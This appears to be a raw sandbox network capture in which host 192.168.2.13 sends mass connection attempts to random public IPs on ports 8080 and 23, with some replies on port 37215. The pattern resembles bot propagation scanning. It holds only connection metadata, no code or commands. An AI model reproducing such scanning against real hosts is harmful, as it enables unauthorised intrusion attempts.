                                              Nov 23, 2023 05:14:48.620239973 CET542028080192.168.2.1394.216.63.33
                                              Nov 23, 2023 05:14:48.620248079 CET542028080192.168.2.1331.84.47.30
                                              Nov 23, 2023 05:14:48.620250940 CET542028080192.168.2.1331.251.217.8
                                              Nov 23, 2023 05:14:48.620263100 CET542028080192.168.2.1394.163.171.21
                                              Nov 23, 2023 05:14:48.620269060 CET542028080192.168.2.1331.227.80.170
                                              Nov 23, 2023 05:14:48.620269060 CET542028080192.168.2.1395.153.71.46
                                              Nov 23, 2023 05:14:48.620270967 CET542028080192.168.2.1331.172.76.36
                                              Nov 23, 2023 05:14:48.620287895 CET542028080192.168.2.1362.232.233.52
                                              Nov 23, 2023 05:14:48.620289087 CET542028080192.168.2.1362.214.88.211
                                              Nov 23, 2023 05:14:48.620296955 CET542028080192.168.2.1394.20.233.12
                                              Nov 23, 2023 05:14:48.620296955 CET542028080192.168.2.1394.242.123.227
                                              Nov 23, 2023 05:14:48.620296955 CET542028080192.168.2.1362.119.136.175
                                              Nov 23, 2023 05:14:48.620296955 CET542028080192.168.2.1331.69.27.149
                                              Nov 23, 2023 05:14:48.620313883 CET542028080192.168.2.1331.241.121.111
                                              Nov 23, 2023 05:14:48.620318890 CET542028080192.168.2.1385.240.55.192
                                              Nov 23, 2023 05:14:48.620321035 CET542028080192.168.2.1385.184.100.88
                                              Nov 23, 2023 05:14:48.620321035 CET542028080192.168.2.1362.170.117.198
                                              Nov 23, 2023 05:14:48.620321035 CET542028080192.168.2.1395.205.197.214
                                              Nov 23, 2023 05:14:48.620322943 CET542028080192.168.2.1331.91.95.252
                                              Nov 23, 2023 05:14:48.620326042 CET542028080192.168.2.1385.73.116.228
                                              Nov 23, 2023 05:14:48.620326996 CET542028080192.168.2.1395.216.190.127
                                              Nov 23, 2023 05:14:48.620330095 CET542028080192.168.2.1331.153.53.208
                                              Nov 23, 2023 05:14:48.620341063 CET542028080192.168.2.1362.21.63.176
                                              Nov 23, 2023 05:14:48.620346069 CET542028080192.168.2.1395.5.87.224
                                              Nov 23, 2023 05:14:48.620349884 CET542028080192.168.2.1331.94.178.180
                                              Nov 23, 2023 05:14:48.620349884 CET542028080192.168.2.1394.242.148.163
                                              Nov 23, 2023 05:14:48.620367050 CET542028080192.168.2.1331.38.172.216
                                              Nov 23, 2023 05:14:48.620367050 CET542028080192.168.2.1385.249.63.10
                                              Nov 23, 2023 05:14:48.620374918 CET542028080192.168.2.1385.240.58.10
                                              Nov 23, 2023 05:14:48.620383978 CET542028080192.168.2.1394.28.233.189
                                              Nov 23, 2023 05:14:48.620388985 CET542028080192.168.2.1331.27.202.176
                                              Nov 23, 2023 05:14:48.620388985 CET542028080192.168.2.1395.209.197.98
                                              Nov 23, 2023 05:14:48.620399952 CET542028080192.168.2.1331.213.248.176
                                              Nov 23, 2023 05:14:48.620399952 CET542028080192.168.2.1362.207.61.152
                                              Nov 23, 2023 05:14:48.620404005 CET542028080192.168.2.1394.109.164.205
                                              Nov 23, 2023 05:14:48.620404959 CET542028080192.168.2.1385.58.117.153
                                              Nov 23, 2023 05:14:48.620404959 CET542028080192.168.2.1385.12.53.229
                                              Nov 23, 2023 05:14:48.620425940 CET542028080192.168.2.1385.138.200.43
                                              Nov 23, 2023 05:14:48.620425940 CET542028080192.168.2.1395.191.183.247
                                              Nov 23, 2023 05:14:48.620428085 CET542028080192.168.2.1331.101.87.134
                                              Nov 23, 2023 05:14:48.620450020 CET542028080192.168.2.1385.245.22.32
                                              Nov 23, 2023 05:14:48.620450020 CET542028080192.168.2.1385.47.232.193
                                              Nov 23, 2023 05:14:48.620450020 CET542028080192.168.2.1385.81.96.37
                                              Nov 23, 2023 05:14:48.620450020 CET542028080192.168.2.1394.229.231.143
                                              Nov 23, 2023 05:14:48.620460987 CET542028080192.168.2.1394.113.45.34
                                              Nov 23, 2023 05:14:48.620467901 CET542028080192.168.2.1331.16.250.21
                                              Nov 23, 2023 05:14:48.620474100 CET542028080192.168.2.1362.62.30.251
                                              Nov 23, 2023 05:14:48.620474100 CET542028080192.168.2.1331.253.137.75
                                              Nov 23, 2023 05:14:48.620487928 CET542028080192.168.2.1385.238.125.115
                                              Nov 23, 2023 05:14:48.620496988 CET542028080192.168.2.1395.236.95.245
                                              Nov 23, 2023 05:14:48.620498896 CET542028080192.168.2.1395.186.31.124
                                              Nov 23, 2023 05:14:48.620498896 CET542028080192.168.2.1362.249.109.104
                                              Nov 23, 2023 05:14:48.620498896 CET542028080192.168.2.1362.5.56.155
                                              Nov 23, 2023 05:14:48.620512962 CET542028080192.168.2.1385.142.56.13
                                              Nov 23, 2023 05:14:48.620517969 CET542028080192.168.2.1362.55.87.84
                                              Nov 23, 2023 05:14:48.620517969 CET542028080192.168.2.1394.105.12.33
                                              Nov 23, 2023 05:14:48.620531082 CET542028080192.168.2.1394.117.146.138
                                              Nov 23, 2023 05:14:48.620537043 CET542028080192.168.2.1331.228.99.121
                                              Nov 23, 2023 05:14:48.620559931 CET542028080192.168.2.1394.180.245.30
                                              Nov 23, 2023 05:14:48.620559931 CET542028080192.168.2.1385.116.182.227
                                              Nov 23, 2023 05:14:48.620559931 CET542028080192.168.2.1331.143.228.244
                                              Nov 23, 2023 05:14:48.620560884 CET542028080192.168.2.1394.35.36.202
                                              Nov 23, 2023 05:14:48.620560884 CET542028080192.168.2.1362.207.173.31
                                              Nov 23, 2023 05:14:48.620560884 CET542028080192.168.2.1385.84.118.190
                                              Nov 23, 2023 05:14:48.620564938 CET542028080192.168.2.1362.204.48.38
                                              Nov 23, 2023 05:14:48.620564938 CET542028080192.168.2.1395.174.194.171
                                              Nov 23, 2023 05:14:48.620564938 CET542028080192.168.2.1331.54.4.109
                                              Nov 23, 2023 05:14:48.620588064 CET542028080192.168.2.1362.2.113.13
                                              Nov 23, 2023 05:14:48.620589018 CET542028080192.168.2.1394.115.85.244
                                              Nov 23, 2023 05:14:48.620603085 CET542028080192.168.2.1385.105.20.102
                                              Nov 23, 2023 05:14:48.620603085 CET542028080192.168.2.1362.246.189.139
                                              Nov 23, 2023 05:14:48.620624065 CET542028080192.168.2.1362.179.71.186
                                              Nov 23, 2023 05:14:48.620626926 CET542028080192.168.2.1331.65.138.149
                                              Nov 23, 2023 05:14:48.620650053 CET542028080192.168.2.1394.72.173.129
                                              Nov 23, 2023 05:14:48.620651960 CET542028080192.168.2.1362.26.100.41
                                              Nov 23, 2023 05:14:48.620651960 CET542028080192.168.2.1362.90.37.135
                                              Nov 23, 2023 05:14:48.620651960 CET542028080192.168.2.1395.7.158.156
                                              Nov 23, 2023 05:14:48.620651960 CET542028080192.168.2.1395.216.245.131
                                              Nov 23, 2023 05:14:48.620651960 CET542028080192.168.2.1385.170.230.127
                                              Nov 23, 2023 05:14:48.620657921 CET542028080192.168.2.1362.96.69.178
                                              Nov 23, 2023 05:14:48.620666027 CET542028080192.168.2.1362.19.222.47
                                              Nov 23, 2023 05:14:48.620666981 CET542028080192.168.2.1385.220.228.210
                                              Nov 23, 2023 05:14:48.620675087 CET542028080192.168.2.1331.219.250.89
                                              Nov 23, 2023 05:14:48.620681047 CET542028080192.168.2.1362.57.229.58
                                              Nov 23, 2023 05:14:48.620701075 CET542028080192.168.2.1385.219.77.255
                                              Nov 23, 2023 05:14:48.620701075 CET542028080192.168.2.1394.6.154.24
                                              Nov 23, 2023 05:14:48.620702028 CET542028080192.168.2.1394.32.248.159
                                              Nov 23, 2023 05:14:48.620702028 CET542028080192.168.2.1385.5.165.76
                                              Nov 23, 2023 05:14:48.620702982 CET542028080192.168.2.1362.117.104.82
                                              Nov 23, 2023 05:14:48.620702982 CET542028080192.168.2.1331.215.121.169
                                              Nov 23, 2023 05:14:48.620708942 CET542028080192.168.2.1362.145.232.248
                                              Nov 23, 2023 05:14:48.620713949 CET542028080192.168.2.1331.78.225.146
                                              Nov 23, 2023 05:14:48.620722055 CET542028080192.168.2.1362.88.95.230
                                              Nov 23, 2023 05:14:48.620728970 CET542028080192.168.2.1331.121.188.25
                                              Nov 23, 2023 05:14:48.620735884 CET542028080192.168.2.1395.90.136.30
                                              Nov 23, 2023 05:14:48.620738029 CET542028080192.168.2.1331.46.183.251
                                              Nov 23, 2023 05:14:48.620757103 CET542028080192.168.2.1362.199.16.15
                                              Nov 23, 2023 05:14:48.620757103 CET542028080192.168.2.1394.125.187.181
                                              Nov 23, 2023 05:14:48.620769978 CET542028080192.168.2.1385.81.180.47
                                              Nov 23, 2023 05:14:48.620771885 CET542028080192.168.2.1331.47.243.41
                                              Nov 23, 2023 05:14:48.620774031 CET542028080192.168.2.1331.166.80.15
                                              Nov 23, 2023 05:14:48.620790958 CET542028080192.168.2.1395.219.26.3
                                              Nov 23, 2023 05:14:48.620790958 CET542028080192.168.2.1362.122.51.134
                                              Nov 23, 2023 05:14:48.620791912 CET542028080192.168.2.1331.245.112.49
                                              Nov 23, 2023 05:14:48.620791912 CET542028080192.168.2.1362.241.34.154
                                              Nov 23, 2023 05:14:48.620791912 CET542028080192.168.2.1394.22.29.122
                                              Nov 23, 2023 05:14:48.620790958 CET542028080192.168.2.1362.43.221.95
                                              Nov 23, 2023 05:14:48.620790958 CET542028080192.168.2.1385.209.156.32
                                              Nov 23, 2023 05:14:48.620806932 CET542028080192.168.2.1331.167.117.213
                                              Nov 23, 2023 05:14:48.620810032 CET542028080192.168.2.1394.251.225.18
                                              Nov 23, 2023 05:14:48.620822906 CET542028080192.168.2.1385.103.88.105
                                              Nov 23, 2023 05:14:48.620822906 CET542028080192.168.2.1362.254.166.78
                                              Nov 23, 2023 05:14:48.620841026 CET542028080192.168.2.1395.98.76.73
                                              Nov 23, 2023 05:14:48.620842934 CET542028080192.168.2.1394.244.232.29
                                              Nov 23, 2023 05:14:48.620842934 CET542028080192.168.2.1331.74.109.211
                                              Nov 23, 2023 05:14:48.620853901 CET542028080192.168.2.1362.113.203.70
                                              Nov 23, 2023 05:14:48.620877028 CET542028080192.168.2.1394.205.221.202
                                              Nov 23, 2023 05:14:48.620877028 CET542028080192.168.2.1385.254.208.70
                                              Nov 23, 2023 05:14:48.620877981 CET542028080192.168.2.1394.103.69.203
                                              Nov 23, 2023 05:14:48.620878935 CET542028080192.168.2.1331.186.230.180
                                              Nov 23, 2023 05:14:48.620878935 CET542028080192.168.2.1394.184.195.72
                                              Nov 23, 2023 05:14:48.620881081 CET542028080192.168.2.1362.201.242.1
                                              Nov 23, 2023 05:14:48.620881081 CET542028080192.168.2.1331.167.111.89
                                              Nov 23, 2023 05:14:48.620881081 CET542028080192.168.2.1385.10.12.114
                                              Nov 23, 2023 05:14:48.620881081 CET542028080192.168.2.1395.163.175.197
                                              Nov 23, 2023 05:14:48.620881081 CET542028080192.168.2.1362.234.239.178
                                              Nov 23, 2023 05:14:48.620881081 CET542028080192.168.2.1394.112.158.42
                                              Nov 23, 2023 05:14:48.620881081 CET542028080192.168.2.1394.145.82.169
                                              Nov 23, 2023 05:14:48.620893002 CET542028080192.168.2.1362.166.151.82
                                              Nov 23, 2023 05:14:48.695663929 CET2355738107.90.211.84192.168.2.13
                                              Nov 23, 2023 05:14:48.720839024 CET80805420294.131.27.66192.168.2.13
                                              Nov 23, 2023 05:14:48.802659035 CET80805420294.130.192.122192.168.2.13
                                              Nov 23, 2023 05:14:48.811635017 CET80805420231.136.47.50192.168.2.13
                                              Nov 23, 2023 05:14:48.811731100 CET542028080192.168.2.1331.136.47.50
                                              Nov 23, 2023 05:14:48.813060999 CET2355738217.66.105.95192.168.2.13
                                              Nov 23, 2023 05:14:48.816497087 CET80805420294.32.158.114192.168.2.13
                                              Nov 23, 2023 05:14:48.821227074 CET80805420295.62.241.126192.168.2.13
                                              Nov 23, 2023 05:14:48.824642897 CET80805420262.99.157.97192.168.2.13
                                              Nov 23, 2023 05:14:48.830118895 CET80805420285.214.71.85192.168.2.13
                                              Nov 23, 2023 05:14:48.830389977 CET80805420262.92.76.129192.168.2.13
                                              Nov 23, 2023 05:14:48.832217932 CET80805420262.141.126.93192.168.2.13
                                              Nov 23, 2023 05:14:48.832372904 CET80805420295.197.8.215192.168.2.13
                                              Nov 23, 2023 05:14:48.834892988 CET80805420285.23.81.202192.168.2.13
                                              Nov 23, 2023 05:14:48.835810900 CET3721554970197.9.157.243192.168.2.13
                                              Nov 23, 2023 05:14:48.841490030 CET80805420295.73.90.235192.168.2.13
                                              Nov 23, 2023 05:14:48.844561100 CET80805420295.220.95.99192.168.2.13
                                              Nov 23, 2023 05:14:48.849291086 CET2355738116.67.155.161192.168.2.13
                                              Nov 23, 2023 05:14:48.857656956 CET80805420294.180.245.30192.168.2.13
                                              Nov 23, 2023 05:14:48.862422943 CET80805420295.86.82.175192.168.2.13
                                              Nov 23, 2023 05:14:48.862565041 CET542028080192.168.2.1395.86.82.175
                                              Nov 23, 2023 05:14:48.867388964 CET80805420294.41.124.225192.168.2.13
                                              Nov 23, 2023 05:14:48.868246078 CET80805420295.133.234.236192.168.2.13
                                              Nov 23, 2023 05:14:48.885740042 CET2355738211.107.63.46192.168.2.13
                                              Nov 23, 2023 05:14:48.917171001 CET372155497041.84.151.7192.168.2.13
                                              Nov 23, 2023 05:14:48.920116901 CET2355738163.49.121.107192.168.2.13
                                              Nov 23, 2023 05:14:48.988276958 CET235573839.86.159.135192.168.2.13
                                              Nov 23, 2023 05:14:49.130279064 CET80805420295.196.28.47192.168.2.13
                                              Nov 23, 2023 05:14:49.130290031 CET80805420295.196.28.47192.168.2.13
                                              Nov 23, 2023 05:14:49.130723000 CET542028080192.168.2.1395.196.28.47
                                              Nov 23, 2023 05:14:49.595036030 CET5573823192.168.2.13148.248.188.25
                                              Nov 23, 2023 05:14:49.595036983 CET5573823192.168.2.13140.221.128.63
                                              Nov 23, 2023 05:14:49.595040083 CET5573823192.168.2.131.36.37.60
                                              Nov 23, 2023 05:14:49.595041990 CET5573823192.168.2.13177.220.76.181
                                              Nov 23, 2023 05:14:49.595041037 CET5573823192.168.2.13121.102.67.200
                                              Nov 23, 2023 05:14:49.595041990 CET5573823192.168.2.1335.211.135.212
                                              Nov 23, 2023 05:14:49.595041990 CET5573823192.168.2.13255.154.193.133
                                              Nov 23, 2023 05:14:49.595081091 CET5573823192.168.2.13211.3.20.82
                                              Nov 23, 2023 05:14:49.595081091 CET5573823192.168.2.13176.152.8.140
                                              Nov 23, 2023 05:14:49.595081091 CET5573823192.168.2.13145.178.250.95
                                              Nov 23, 2023 05:14:49.595081091 CET5573823192.168.2.13153.55.126.49
                                              Nov 23, 2023 05:14:49.595081091 CET5573823192.168.2.13109.154.183.12
                                              Nov 23, 2023 05:14:49.595083952 CET5573823192.168.2.13115.27.225.132
                                              Nov 23, 2023 05:14:49.595082998 CET5573823192.168.2.13190.129.239.100
                                              Nov 23, 2023 05:14:49.595082045 CET5573823192.168.2.13116.59.201.44
                                              Nov 23, 2023 05:14:49.595083952 CET5573823192.168.2.1394.73.160.37
                                              Nov 23, 2023 05:14:49.595083952 CET5573823192.168.2.13117.46.197.162
                                              Nov 23, 2023 05:14:49.595081091 CET5573823192.168.2.1384.198.82.177
                                              Nov 23, 2023 05:14:49.595083952 CET5573823192.168.2.13116.33.164.134
                                              Nov 23, 2023 05:14:49.595082998 CET5573823192.168.2.13152.236.246.203
                                              Nov 23, 2023 05:14:49.595081091 CET5573823192.168.2.13178.15.71.141
                                              Nov 23, 2023 05:14:49.595083952 CET5573823192.168.2.13251.47.143.209
                                              Nov 23, 2023 05:14:49.595082998 CET5573823192.168.2.13255.201.115.14
                                              Nov 23, 2023 05:14:49.595083952 CET5573823192.168.2.13147.0.176.236
                                              Nov 23, 2023 05:14:49.595082045 CET5573823192.168.2.13209.192.102.232
                                              Nov 23, 2023 05:14:49.595081091 CET5573823192.168.2.13219.231.161.176
                                              Nov 23, 2023 05:14:49.595082045 CET5573823192.168.2.1367.219.248.114
                                              Nov 23, 2023 05:14:49.595103025 CET5573823192.168.2.1375.254.0.39
                                              Nov 23, 2023 05:14:49.595105886 CET5573823192.168.2.13198.177.244.51
                                              Nov 23, 2023 05:14:49.595108032 CET5573823192.168.2.13162.188.62.180
                                              Nov 23, 2023 05:14:49.595108032 CET5573823192.168.2.13182.59.29.48
                                              Nov 23, 2023 05:14:49.595108032 CET5573823192.168.2.1340.40.106.151
                                              Nov 23, 2023 05:14:49.595119953 CET5573823192.168.2.1366.181.136.171
                                              Nov 23, 2023 05:14:49.595119953 CET5573823192.168.2.13186.118.240.160
                                              Nov 23, 2023 05:14:49.595119953 CET5573823192.168.2.1361.127.230.230
                                              Nov 23, 2023 05:14:49.595122099 CET5573823192.168.2.13249.245.40.173
                                              Nov 23, 2023 05:14:49.595132113 CET5573823192.168.2.13200.141.146.218
                                              Nov 23, 2023 05:14:49.595139980 CET5573823192.168.2.1345.240.251.194
                                              Nov 23, 2023 05:14:49.595139980 CET5573823192.168.2.13149.78.134.52
                                              Nov 23, 2023 05:14:49.595139980 CET5573823192.168.2.1361.38.147.239
                                              Nov 23, 2023 05:14:49.595139980 CET5573823192.168.2.13177.83.21.254
                                              Nov 23, 2023 05:14:49.595139980 CET5573823192.168.2.13115.116.217.93
                                              Nov 23, 2023 05:14:49.595141888 CET5573823192.168.2.1348.167.172.214
                                              Nov 23, 2023 05:14:49.595141888 CET5573823192.168.2.13142.238.90.66
                                              Nov 23, 2023 05:14:49.595143080 CET5573823192.168.2.1337.186.19.0
                                              Nov 23, 2023 05:14:49.595141888 CET5573823192.168.2.13196.180.37.91
                                              Nov 23, 2023 05:14:49.595143080 CET5573823192.168.2.13115.99.70.177
                                              Nov 23, 2023 05:14:49.595141888 CET5573823192.168.2.13218.235.80.34
                                              Nov 23, 2023 05:14:49.595143080 CET5573823192.168.2.1378.125.234.126
                                              Nov 23, 2023 05:14:49.595141888 CET5573823192.168.2.131.108.248.163
                                              Nov 23, 2023 05:14:49.595144033 CET5573823192.168.2.13221.253.32.9
                                              Nov 23, 2023 05:14:49.595148087 CET5573823192.168.2.13175.136.169.129
                                              Nov 23, 2023 05:14:49.595141888 CET5573823192.168.2.1384.6.139.206
                                              Nov 23, 2023 05:14:49.595143080 CET5573823192.168.2.1398.30.138.79
                                              Nov 23, 2023 05:14:49.595149040 CET5573823192.168.2.1358.147.177.111
                                              Nov 23, 2023 05:14:49.595143080 CET5573823192.168.2.1341.145.85.176
                                              Nov 23, 2023 05:14:49.595149040 CET5573823192.168.2.13113.193.90.204
                                              Nov 23, 2023 05:14:49.595149994 CET5573823192.168.2.1399.34.44.154
                                              Nov 23, 2023 05:14:49.595149994 CET5573823192.168.2.1341.127.31.196
                                              Nov 23, 2023 05:14:49.595149994 CET5573823192.168.2.135.187.1.197
                                              Nov 23, 2023 05:14:49.595149994 CET5573823192.168.2.1375.235.227.80
                                              Nov 23, 2023 05:14:49.595149994 CET5573823192.168.2.1378.157.20.46
                                              Nov 23, 2023 05:14:49.595158100 CET5573823192.168.2.1372.165.22.116
                                              Nov 23, 2023 05:14:49.595159054 CET5573823192.168.2.13165.62.249.194
                                              Nov 23, 2023 05:14:49.595171928 CET5573823192.168.2.1377.175.152.85
                                              Nov 23, 2023 05:14:49.595172882 CET5573823192.168.2.13203.148.45.48
                                              Nov 23, 2023 05:14:49.595175982 CET5573823192.168.2.1340.180.32.156
                                              Nov 23, 2023 05:14:49.595179081 CET5573823192.168.2.1353.196.171.179
                                              Nov 23, 2023 05:14:49.595179081 CET5573823192.168.2.13207.38.92.129
                                              Nov 23, 2023 05:14:49.595191956 CET5573823192.168.2.13205.129.6.102
                                              Nov 23, 2023 05:14:49.595192909 CET5573823192.168.2.1338.129.61.170
                                              Nov 23, 2023 05:14:49.595196962 CET5573823192.168.2.1360.8.176.106
                                              Nov 23, 2023 05:14:49.595202923 CET5573823192.168.2.135.65.65.122
                                              Nov 23, 2023 05:14:49.595202923 CET5573823192.168.2.13163.190.20.75
                                              Nov 23, 2023 05:14:49.595211029 CET5573823192.168.2.13198.0.99.121
                                              Nov 23, 2023 05:14:49.595216036 CET5573823192.168.2.1348.8.226.171
                                              Nov 23, 2023 05:14:49.595227003 CET5573823192.168.2.13192.232.229.150
                                              Nov 23, 2023 05:14:49.595230103 CET5573823192.168.2.13189.237.150.61
                                              Nov 23, 2023 05:14:49.595230103 CET5573823192.168.2.13184.126.100.79
                                              Nov 23, 2023 05:14:49.595241070 CET5573823192.168.2.1375.171.73.3
                                              Nov 23, 2023 05:14:49.595241070 CET5573823192.168.2.1380.209.13.6
                                              Nov 23, 2023 05:14:49.595257998 CET5573823192.168.2.1332.236.99.97
                                              Nov 23, 2023 05:14:49.595267057 CET5573823192.168.2.13191.112.222.36
                                              Nov 23, 2023 05:14:49.595267057 CET5573823192.168.2.13175.207.32.63
                                              Nov 23, 2023 05:14:49.595285892 CET5573823192.168.2.1382.178.41.35
                                              Nov 23, 2023 05:14:49.595289946 CET5573823192.168.2.13212.138.52.169
                                              Nov 23, 2023 05:14:49.595290899 CET5573823192.168.2.1339.206.224.186
                                              Nov 23, 2023 05:14:49.595293999 CET5573823192.168.2.13108.81.135.247
                                              Nov 23, 2023 05:14:49.595295906 CET5573823192.168.2.1395.98.96.218
                                              Nov 23, 2023 05:14:49.595295906 CET5573823192.168.2.1369.216.128.99
                                              Nov 23, 2023 05:14:49.595295906 CET5573823192.168.2.13164.134.85.168
                                              Nov 23, 2023 05:14:49.595307112 CET5573823192.168.2.1354.29.227.27
                                              Nov 23, 2023 05:14:49.595313072 CET5573823192.168.2.13171.22.53.167
                                              Nov 23, 2023 05:14:49.595314026 CET5573823192.168.2.139.83.27.63
                                              Nov 23, 2023 05:14:49.595338106 CET5573823192.168.2.13155.197.61.137
                                              Nov 23, 2023 05:14:49.595338106 CET5573823192.168.2.1396.82.8.45
                                              Nov 23, 2023 05:14:49.595345020 CET5573823192.168.2.13218.104.7.92
                                              Nov 23, 2023 05:14:49.595354080 CET5573823192.168.2.13117.104.184.141
                                              Nov 23, 2023 05:14:49.595357895 CET5573823192.168.2.1370.126.101.221
                                              Nov 23, 2023 05:14:49.595370054 CET5573823192.168.2.13107.68.2.36
                                              Nov 23, 2023 05:14:49.595374107 CET5573823192.168.2.13220.198.154.169
                                              Nov 23, 2023 05:14:49.595387936 CET5573823192.168.2.13216.80.84.149
                                              Nov 23, 2023 05:14:49.595387936 CET5573823192.168.2.1347.64.20.23
                                              Nov 23, 2023 05:14:49.595400095 CET5573823192.168.2.138.34.236.237
                                              Nov 23, 2023 05:14:49.595405102 CET5573823192.168.2.13165.22.38.240
                                              Nov 23, 2023 05:14:49.595407963 CET5573823192.168.2.13250.59.129.225
                                              Nov 23, 2023 05:14:49.595407963 CET5573823192.168.2.13205.165.184.85
                                              Nov 23, 2023 05:14:49.595413923 CET5573823192.168.2.1332.100.94.93
                                              Nov 23, 2023 05:14:49.595427036 CET5573823192.168.2.139.43.142.243
                                              Nov 23, 2023 05:14:49.595428944 CET5573823192.168.2.13180.2.145.181
                                              Nov 23, 2023 05:14:49.595443964 CET5573823192.168.2.13103.185.226.135
                                              Nov 23, 2023 05:14:49.595444918 CET5573823192.168.2.1377.54.231.125
                                              Nov 23, 2023 05:14:49.595444918 CET5573823192.168.2.13180.1.87.55
                                              Nov 23, 2023 05:14:49.595457077 CET5573823192.168.2.13111.190.85.251
                                              Nov 23, 2023 05:14:49.595463991 CET5573823192.168.2.13125.36.234.14
                                              Nov 23, 2023 05:14:49.595472097 CET5573823192.168.2.139.162.75.152
                                              Nov 23, 2023 05:14:49.595479012 CET5573823192.168.2.1394.234.9.109
                                              Nov 23, 2023 05:14:49.595479012 CET5573823192.168.2.13167.90.231.184
                                              Nov 23, 2023 05:14:49.595494986 CET5573823192.168.2.13142.158.74.144
                                              Nov 23, 2023 05:14:49.595495939 CET5573823192.168.2.1343.175.61.226
                                              Nov 23, 2023 05:14:49.595499992 CET5573823192.168.2.1386.199.127.118
                                              Nov 23, 2023 05:14:49.595499992 CET5573823192.168.2.1318.249.69.85
                                              Nov 23, 2023 05:14:49.595500946 CET5573823192.168.2.13166.231.24.67
                                              Nov 23, 2023 05:14:49.595516920 CET5573823192.168.2.13110.61.197.17
                                              Nov 23, 2023 05:14:49.595519066 CET5573823192.168.2.13205.244.201.53
                                              Nov 23, 2023 05:14:49.595520020 CET5573823192.168.2.13109.202.4.190
                                              Nov 23, 2023 05:14:49.595520020 CET5573823192.168.2.13210.192.117.82
                                              Nov 23, 2023 05:14:49.595524073 CET5573823192.168.2.13124.85.179.240
                                              Nov 23, 2023 05:14:49.595525980 CET5573823192.168.2.13124.118.223.65
                                              Nov 23, 2023 05:14:49.595545053 CET5573823192.168.2.13117.58.173.66
                                              Nov 23, 2023 05:14:49.595551014 CET5573823192.168.2.13103.34.164.199
                                              Nov 23, 2023 05:14:49.595552921 CET5573823192.168.2.13155.18.80.202
                                              Nov 23, 2023 05:14:49.595571995 CET5573823192.168.2.1343.180.18.189
                                              Nov 23, 2023 05:14:49.595572948 CET5573823192.168.2.13255.182.69.57
                                              Nov 23, 2023 05:14:49.595577002 CET5573823192.168.2.1323.16.156.214
                                              Nov 23, 2023 05:14:49.595581055 CET5573823192.168.2.1396.37.103.251
                                              Nov 23, 2023 05:14:49.595597982 CET5573823192.168.2.13220.191.157.39
                                              Nov 23, 2023 05:14:49.595602036 CET5573823192.168.2.13205.0.144.253
                                              Nov 23, 2023 05:14:49.595607042 CET5573823192.168.2.13176.3.215.150
                                              Nov 23, 2023 05:14:49.595619917 CET5573823192.168.2.13152.243.118.232
                                              Nov 23, 2023 05:14:49.595621109 CET5573823192.168.2.13186.91.236.73
                                              Nov 23, 2023 05:14:49.595624924 CET5573823192.168.2.1313.92.59.107
                                              Nov 23, 2023 05:14:49.595628023 CET5573823192.168.2.13160.13.146.228
                                              Nov 23, 2023 05:14:49.595640898 CET5573823192.168.2.13150.83.100.26
                                              Nov 23, 2023 05:14:49.595640898 CET5573823192.168.2.1337.178.200.53
                                              Nov 23, 2023 05:14:49.595640898 CET5573823192.168.2.13125.121.63.252
                                              Nov 23, 2023 05:14:49.595662117 CET5573823192.168.2.13193.35.156.86
                                              Nov 23, 2023 05:14:49.595663071 CET5573823192.168.2.1336.223.80.25
                                              Nov 23, 2023 05:14:49.595673084 CET5573823192.168.2.1318.55.34.187
                                              Nov 23, 2023 05:14:49.595674038 CET5573823192.168.2.13168.101.210.161
                                              Nov 23, 2023 05:14:49.595689058 CET5573823192.168.2.13123.64.44.124
                                              Nov 23, 2023 05:14:49.595690966 CET5573823192.168.2.13156.75.91.140
                                              Nov 23, 2023 05:14:49.595690966 CET5573823192.168.2.1374.77.252.87
                                              Nov 23, 2023 05:14:49.595698118 CET5573823192.168.2.13144.78.62.101
                                              Nov 23, 2023 05:14:49.595699072 CET5573823192.168.2.1342.183.200.212
                                              Nov 23, 2023 05:14:49.595700026 CET5573823192.168.2.1335.235.27.242
                                              Nov 23, 2023 05:14:49.595700026 CET5573823192.168.2.13158.158.207.199
                                              Nov 23, 2023 05:14:49.595720053 CET5573823192.168.2.13243.150.211.87
                                              Nov 23, 2023 05:14:49.595720053 CET5573823192.168.2.13153.43.215.135
                                              Nov 23, 2023 05:14:49.595722914 CET5573823192.168.2.1332.201.18.178
                                              Nov 23, 2023 05:14:49.595751047 CET5573823192.168.2.13153.20.248.78
                                              Nov 23, 2023 05:14:49.595751047 CET5573823192.168.2.13253.254.91.219
                                              Nov 23, 2023 05:14:49.595756054 CET5573823192.168.2.13194.33.1.3
                                              Nov 23, 2023 05:14:49.595756054 CET5573823192.168.2.13154.31.250.220
                                              Nov 23, 2023 05:14:49.595772028 CET5573823192.168.2.134.41.189.198
                                              Nov 23, 2023 05:14:49.595776081 CET5573823192.168.2.13241.46.91.135
                                              Nov 23, 2023 05:14:49.595776081 CET5573823192.168.2.13202.99.165.160
                                              Nov 23, 2023 05:14:49.595797062 CET5573823192.168.2.1369.212.174.141
                                              Nov 23, 2023 05:14:49.595798016 CET5573823192.168.2.13124.254.252.146
                                              Nov 23, 2023 05:14:49.595801115 CET5573823192.168.2.13106.67.52.216
                                              Nov 23, 2023 05:14:49.595801115 CET5573823192.168.2.1374.13.39.77
                                              Nov 23, 2023 05:14:49.595801115 CET5573823192.168.2.13197.30.112.102
                                              Nov 23, 2023 05:14:49.595805883 CET5573823192.168.2.13143.26.102.45
                                              Nov 23, 2023 05:14:49.595825911 CET5573823192.168.2.13124.89.120.152
                                              Nov 23, 2023 05:14:49.595828056 CET5573823192.168.2.13254.111.74.75
                                              Nov 23, 2023 05:14:49.595830917 CET5573823192.168.2.1342.83.114.217
                                              Nov 23, 2023 05:14:49.595830917 CET5573823192.168.2.13198.253.45.203
                                              Nov 23, 2023 05:14:49.595832109 CET5573823192.168.2.13164.92.170.172
                                              Nov 23, 2023 05:14:49.595835924 CET5573823192.168.2.13195.222.48.168
                                              Nov 23, 2023 05:14:49.595839977 CET5573823192.168.2.1370.233.219.194
                                              Nov 23, 2023 05:14:49.595845938 CET5573823192.168.2.13141.101.88.94
                                              Nov 23, 2023 05:14:49.595854044 CET5573823192.168.2.13119.206.124.18
                                              Nov 23, 2023 05:14:49.595854044 CET5573823192.168.2.13255.83.132.101
                                              Nov 23, 2023 05:14:49.595865011 CET5573823192.168.2.13183.196.60.26
                                              Nov 23, 2023 05:14:49.595871925 CET5573823192.168.2.1338.8.32.31
                                              Nov 23, 2023 05:14:49.595886946 CET5573823192.168.2.13202.164.89.53
                                              Nov 23, 2023 05:14:49.595890045 CET5573823192.168.2.13178.25.76.94
                                              Nov 23, 2023 05:14:49.595909119 CET5573823192.168.2.13113.110.141.153
                                              Nov 23, 2023 05:14:49.595922947 CET5573823192.168.2.13163.137.202.97
                                              Nov 23, 2023 05:14:49.595930099 CET5573823192.168.2.13164.238.169.115
